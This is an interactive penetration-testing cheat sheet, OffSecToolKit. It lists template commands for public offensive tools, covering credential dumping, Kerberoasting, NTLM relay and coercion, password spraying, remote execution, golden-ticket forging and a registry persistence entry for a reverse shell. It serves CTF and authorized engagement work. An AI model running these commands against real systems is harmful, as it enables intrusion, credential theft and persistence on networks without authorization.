OffSecToolKit

Star

OffSecToolKit is an interactive cheat sheet, containing a curated list of offensive security tools and their respective commands.

If you hate constantly looking up the right command to use while conducting CTFs or Offensive Security enagements, this project should help ease the pain a bit. Just select what phase you are currently in or what services are open and it will display a list of tools you can try against the machine, along with a template command for easy copy/pasting. See the full list of items and filters.

This project was created by Tony Harkness and was inspired by GTFOBins and LOLBAS. I relied heavily on GTFOBins’ site template to make this one.

I’m hoping to make OffSecToolKit a collaborative project, so please feel free to contribute your commands.

Command
winpeas.exe cmd > output.txt Privilege Escalation Shell Windows
python3 targetedKerberoast.py -d test.local -u john -p password123 --dc-ip 10.10.10.1 Exploitation Username Password Kerberos NTLM Linux
dirsearch -u http://10.10.10.1 Enumeration No Creds Web Linux Windows
./windapsearch --dc-ip 10.10.10.1 -u test.local\\john -p password123 -U -G --da -m "Remote Desktop Users" -C -r Enumeration Username Password Linux Windows
whatweb -a 3 https://www.facebook.com -v Enumeration No Creds Web Linux Windows
wmiexec.py john:"password123"@10.10.10.1 "whoami" Enumeration No Creds WMI Linux Windows
wafw00f -v https://test.local Enumeration No Creds Web Linux Windows
./odat.py utlfile -s 10.10.10.1 -d oracle -U john -P password123 --sysdba --putFile /tmp/ file.txt ./test.txt Enumeration No Creds TNS Linux Windows
sqlplus john/password123@10.10.10.1/oracle Enumeration No Creds TNS Linux Windows
./odat.py all -s 10.10.10.1 Enumeration No Creds TNS Linux Windows
./odat.py utlfile -s 10.10.10.1 -d oracle -U john -P password123 --test-module --getFile /etc/ passwd passwd.txt Enumeration No Creds TNS Linux Windows
Snaffler.exe -s -o snaffler_output.log -d test.local -c 10.10.10.1 Enumeration Shell SMB Windows
SharpWMI.exe action=query query="select * from win32_process" Shell WMI Windows
SharpUp.exe > output.txt Privilege Escalation Shell Windows
SharpLDAPmonitor.exe /dcip:10.10.10.1 /user:TEST.local\john /pass:password123 Enumeration Username Password LDAP Kerberos NTLM Windows
SharpHound.exe --CollectionMethods All --ZipFileName output.zip Enumeration Privilege Escalation Shell Windows
SharpHound.exe --CollectionMethod All --LdapUsername john --LdapPassword password123 --ZipFileName output.zip Enumeration Privilege Escalation Username Password Shell LDAP Windows
SharpDump.exe Enumeration Privilege Escalation Shell Windows
Seatbelt.exe -group=all -full > output.txt Privilege Escalation Shell Windows
SafetyKatz.exe Enumeration Privilege Escalation Shell Windows
ssh-audit.py 10.10.10.1 Enumeration No Creds SSH Linux Windows
snmpwalk -v2c -c public 10.10.10.1 Enumeration No Creds SNMP Linux Windows
telnet 10.10.10.1 25 Enumeration No Creds SMTP Linux Windows
python3 smbmap.py --host-file smb-hosts.txt -u john -p 'password123' -d test.local -L Enumeration Username Password SMB Linux Windows
python3 smbmap.py --host-file smb-hosts.txt -d test.local -L Enumeration No Creds SMB Linux Windows
python3 smbmap.py --host-file smb-hosts.txt -u john -p 'password123' -d test.local -F password Enumeration Username Password SMB Linux Windows
smbclient -L //10.10.10.1 -U john password123 Enumeration Username Password SMB Linux
smbclient -N -L //10.10.10.1 Enumeration No Creds SMB Linux
smbclient -L //10.10.10.1 -U test.local/john --pw-nt-hash XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX Enumeration Username Hash SMB Linux
smbclient ////10.10.10.1//public -U john password123 Enumeration Username Password SMB Linux
smbclient ////10.10.10.1//public -N Enumeration No Creds SMB Linux
Rubeus.exe kerberoast /outfile:hashes.txt Exploitation Privilege Escalation Shell Kerberos Windows
Rubeus.exe /users:usernames.txt /passwords:passwords.txt /domain:test.local /outfile:found_passwords.txt Enumeration No Creds Kerberos Windows
Rubeus.exe asktgt /domain:test.local /user:john /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt Exploitation Username Hash Kerberos Windows
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt Exploitation Privilege Escalation Shell Kerberos Windows
Responder -I eth0 -A Exploitation No Creds SMB NTLM Linux Windows
reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Persistence /t REG_SZ /d "C:\Path\To\revshell.exe" reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Persistence /t REG_SZ /d "C:\Path\To\revshell.exe" Shell Windows
rpcclient -U '' -N 10.10.10.1 Enumeration No Creds Linux
rdp-sec-check.pl 10.10.10.1 Enumeration No Creds RDP Linux Windows
xfreerdp /u:john /p:"password123" /v:10.10.10.1 Enumeration No Creds RDP Linux Windows
python3 pywhisker.py -d "test.local" -u "john" -p "password123" --target "user2" --action "list" --dc-ip "10.10.10.1" Exploitation Username Password Kerberos Linux
python3 ldapmonitor.py -u 'john' -d 'TEST.local' -p 'password123' --dc-ip 10.10.10.1 Enumeration Username Password Hash LDAP Kerberos NTLM Linux
Get-DomainUser -Domain test.local -DomainController 10.10.10.1 Enumeration Shell Windows
Get-DomainUser -Domain test.local -DomainController 10.10.10.1 -PreauthNotRequired -Properties SamAccountName Enumeration Shell Windows
Get-DomainGroupMember -identity "Domain Admins" -Domain test.local -DomainController 10.10.10.1 Enumeration Shell Windows
Find-DomainShare -CheckShareAccess -Domain test.local -DomainController 10.10.10.1 Enumeration Shell Windows
python3 PetitPotam.py -d test.local -u john -p password123 10.10.10.2 10.10.10.1 Exploitation Username Password NTLM Linux Windows
openssl s_client -connect 10.10.10.1:pop3s Enumeration No Creds POP3 Linux Windows
python3 gettgtpkinit.py test.local/DC01\$ -cert-pfx crt.pfx -pfx-pass password123 out.ccache Exploitation Privilege Escalation Username Password PFX Kerberos Linux Windows
KRB5CCNAME=out.ccache python3 getnthash.py test.local/DC01\$ -key 6e63333c372d7fbe64dab63f36673d0cd03bfb92b2a6c96e70070be7cb07f773 Exploitation Privilege Escalation TGT Kerberos Linux Windows
onesixtyone -c community-strings.list 10.10.10.1 Enumeration No Creds SNMP Linux Windows
nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='test.local',userdb=usernames.txt 10.10.10.1 Enumeration No Creds Kerberos Linux Windows
netexec smb 10.10.10.1 -u users.txt -p password123 Exploitation Username SMB Linux
netexec smb 10.10.10.1 -u 'john' -p 'password123' -X '$Host' Exploitation Username Password SMB Linux
netexec smb 10.10.10.1 -u 'john' -p 'password123' --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol Enumeration Username Password SMB Linux
netexec smb smb_host.txt --gen-relay-list output.txt Enumeration No Creds SMB Linux
netexec smb 10.10.10.1 -u '' -p '' Enumeration No Creds SMB Linux
netexec smb 10.10.10.1 -u 'a' -p '' Enumeration No Creds SMB Linux
nxc ldap 10.10.10.1 -u 'john' -p 'password123' --trusted-for-delegation --password-not-required --admin-count --users --groups Enumeration Username Password LDAP Linux
umount ./target-NFS Enumeration Username Password NFS Linux Windows
showmount -e 10.10.10.1 Enumeration Username Password NFS Linux Windows
mkdir target-NFS sudo mount -t nfs 10.10.10.1:/public ./target-NFS/ -o nolock Enumeration Username Password NFS Linux Windows
mysql -u john -ppassword123 -h 10.10.10.1 Enumeration No Creds MySQL Linux Windows
mitm6 -d test.local --ignore-nofqnd Exploitation No Creds DNS Linux Windows
mssqlclient.py john@10.10.10.1 -windows-auth Enumeration No Creds MSSQL Linux Windows
ldapsearch -LLL -x -H ldap://test.local -b'' -s base '(objectclass=\*)' Enumeration No Creds LDAP Linux
ldapsearch -h test.local -D 'ldap@test.local' -w password123 -b 'dc=test,dc=local' Enumeration Username Password LDAP Linux
kerbrute userenum -d test.local usernames.txt Enumeration No Creds Kerberos Linux Windows
kerbrute passwordspray -d test.local domain_users.txt password123 Enumeration Username Kerberos Linux Windows
kerbrute bruteuser -d test.local passwords.txt john Enumeration Username Kerberos Linux Windows
cat credentials.txt | kerbrute_linux_amd64 -d test.local bruteforce - Enumeration No Creds Kerberos Linux
python3 getTGT.py test.local/john -dc-ip 10.10.10.1 -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7 Exploitation Username Hash Kerberos Linux Windows
python3 getST.py -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7 -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john Exploitation Privilege Escalation Username Hash Kerberos Linux Windows
python3 getST.py -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123 Exploitation Privilege Escalation Username Password Kerberos Linux Windows
python3 atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 test.local/john@10.10.10.1 whoami Exploitation Username Hash SMB Linux Windows
python3 atexec.py test.local/john:password123@10.10.10.1 whoami Exploitation Username Password SMB Linux Windows
python3 addcomputer.py -method SAMR -dc-ip 10.10.10.1 -computer-pass TestPassword321 -computer-name testComputer test.local/john:password123 Exploitation Username Password SMB Linux Windows
python3 addcomputer.py -method LDAPS -dc-ip 10.10.10.1 -computer-pass TestPassword321 -computer-name testComputer test.local/john:password123 Exploitation Username Password LDAP Linux Windows
python3 wmiexec.py test.local/john:password123@10.10.10.1 Exploitation Username Password WMI Linux Windows
python3 ticketer.py -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain test.local -dc-ip 10.10.10.1 -spn cifs/test.local john Exploitation Username Hash Kerberos Linux Windows
python3 services.py test.local/john:password123@10.10.10.1 list Enumeration Username Password Linux Windows
python3 secretsdump.py test.local/john:password123@10.10.10.1 Exploitation Username Password Kerberos NTLM Linux Windows
python3 secretsdump.py -ntds C:\Windows\NTDS\ntds.dit -system C:\Windows\System32\Config\system -dc-ip 10.10.10.1 test.local/john:password123@10.10.10.2 Exploitation Username Password Kerberos NTLM Linux Windows
python3 smbexec.py test.local/john:password123@10.10.10.1 Exploitation Username Password SMB Linux Windows
python3 smbclient.py test.local/john:password123@10.10.10.1 Enumeration Username Password SMB Linux Windows
python3 samrdump.py test.local/john:password123@10.10.10.1 Enumeration Username Password Linux Windows
python3 reg.py test.local/john:password123@10.10.10.1 query -keyName HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows -s Exploitation Username Password SMB Linux Windows
python3 rpcdump.py test.local/john:password123@10.10.10.1 Enumeration Username Password Linux Windows
python3 rbcd.py -action write -delegate-to "DC01$" -delegate-from "EVILCOMPUTER$" -dc-ip 10.10.10.1 -hashes :A9FDFA038C4B75EBC76DC855DD74F0DA test.local/john Exploitation Privilege Escalation Username Hash SMB LDAP Kerberos Linux Windows
python3 psexec.py test.local/john:password123@10.10.10.1 Exploitation Username Password SMB Linux Windows
export KRB5CCNAME=/full/path/to/john.ccache; python3 psexec.py test.local/john@10.10.10.1 -k -no-pass Exploitation Username TGS SMB Linux Windows
python3 ntlmrelayx.py -smb2support -t smb://10.10.10.1 -c 'whoami /all' -debug Exploitation No Creds NTLM Linux Windows
python3 ntlmrelayx.py -t ldaps://dc.test.local -wh test-wpad --delegat-access Exploitation No Creds LDAP NTLM Linux Windows
python3 ntlmrelayx.py -smb2support -t smb://10.10.10.1 -socks Exploitation No Creds SMB NTLM Linux Windows
python3 mimikatz.py test.local/john:password123@10.10.10.1 Exploitation Username Password Kerberos Linux Windows
python3 lookupsid.py test.local/john:password123@10.10.10.1 Enumeration Username Password Linux Windows
python3 ticketer.py -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain test.local -dc-ip 10.10.10.1 john Exploitation Username Hash Kerberos Linux Windows
python3 GetUserSPNs.py test.local/john:password123 -dc-ip 10.10.10.1 -request Exploitation Username Password Kerberos Linux Windows
python3 GetNPUsers.py test.local/ -dc-ip 10.10.10.1 -usersfile usernames.txt -format hashcat -outputfile hashes.txt Exploitation Username Kerberos Linux Windows
python3 GetADUsers.py -all test.local/john:password123 -dc-ip 10.10.10.1 Enumeration Username Password Kerberos Linux Windows
python3 Get-GPPPassword.py 'TEST.local/john:password123@DC01.TEST.local' -dc-ip 10.10.10.1 Enumeration Exploitation Username Password Hash SMB Linux Windows
python3 dcomexec.py -object MMC20 test.local/john:password123@10.10.10.1 Exploitation Username Password DCOM Linux Windows
msfconsole use auxiliary/scanner/ipmi/ipmi_version Enumeration No Creds IPMI Linux Windows
msfconsole use auxiliary/scanner/ipmi/ipmi_dumphashes Enumeration No Creds IPMI Linux Windows
hashcat -m 7300 ipmi-hash.txt /usr/share/wordlists/rockyou.txt Enumeration No Creds IPMI Linux Windows
openssl s_client -connect 10.10.10.1:imaps Enumeration No Creds IMAP Linux Windows
gobuster vhost -u 10.10.10.1 -w /usr/share/wordlists/seclists/Discovery/DNS/fierce-hostlist.txt Enumeration No Creds Web Linux Windows
gobuster dns -q -r 10.10.10.1 -d test.local -w /usr/share/wordlists/seclists/Discovery/DNS/fierce-hostlist.txt -p ./patterns.txt -o output.txt Enumeration No Creds Web Linux Windows
openssl s_client -connect 10.0.0.1:21 -starttls ftp Enumeration Username Password No Creds FTP Linux
ftp 10.0.0.1 Enumeration Username Password No Creds FTP Linux
wget -m --no-passive ftp://anonymous:anonymous@10.0.0.1 Enumeration Username Password No Creds FTP Linux
python3 FindUncommonShares.py -u 'john' -d 'TEST.local' -p 'password123' --dc-ip 10.10.10.1 Enumeration Username Password Hash SMB Linux Windows
eyewitness.py -f urls.txt --single https://test.local Enumeration No Creds Web Linux Windows
evil-winrm -i 10.10.10.1 -c pub.pem -k priv.pem -S -r EVILCORP Exploitation PFX WMI Windows
evil-winrm -i 10.10.10.1 -u john -p password123 Exploitation Username Password WMI Linux Windows
evil-winrm -i 10.10.10.1 -u john -H c23b2e293fa0d312de6f59fd6d58eae3 Exploitation Username Hash WMI Linux Windows
enum4linux-ng.py -a 10.10.10.1 Enumeration No Creds Linux
enum4linux-ng.py -u john -p password123 -a 10.10.10.1 Enumeration Username Password Linux
dig axfr test.local @10.10.10.1 Enumeration No Creds DNS Linux Windows
dig ns test.local @10.10.10.1 Enumeration No Creds DNS Linux Windows
dig any test.local @10.10.10.1 Enumeration No Creds DNS Linux Windows
python3 dementor.py -u john -p password123 -d test.local 10.10.10.2 10.10.10.1 Exploitation Username Password NTLM Linux Windows
dnsenum --dnsserver 10.10.10.1 --enum -p 0 -s 0 -o found_subdomains.txt -f ~/subdomains.list test.local Enumeration No Creds DNS Linux Windows
braa public@10.10.10.1:.1.* Enumeration No Creds SNMP Linux Windows
bloodhound.py -d test.local -v --zip -c All -dc test.local -ns 10.10.10.1 Enumeration No Creds LDAP Linux Windows
bloodhound.py -u john -p password123 -d test.local -v --zip -c All -dc test.local -ns 10.10.10.1 Enumeration Username Password LDAP Linux Windows
Couldn't find the command you're looking for? Contribute your own!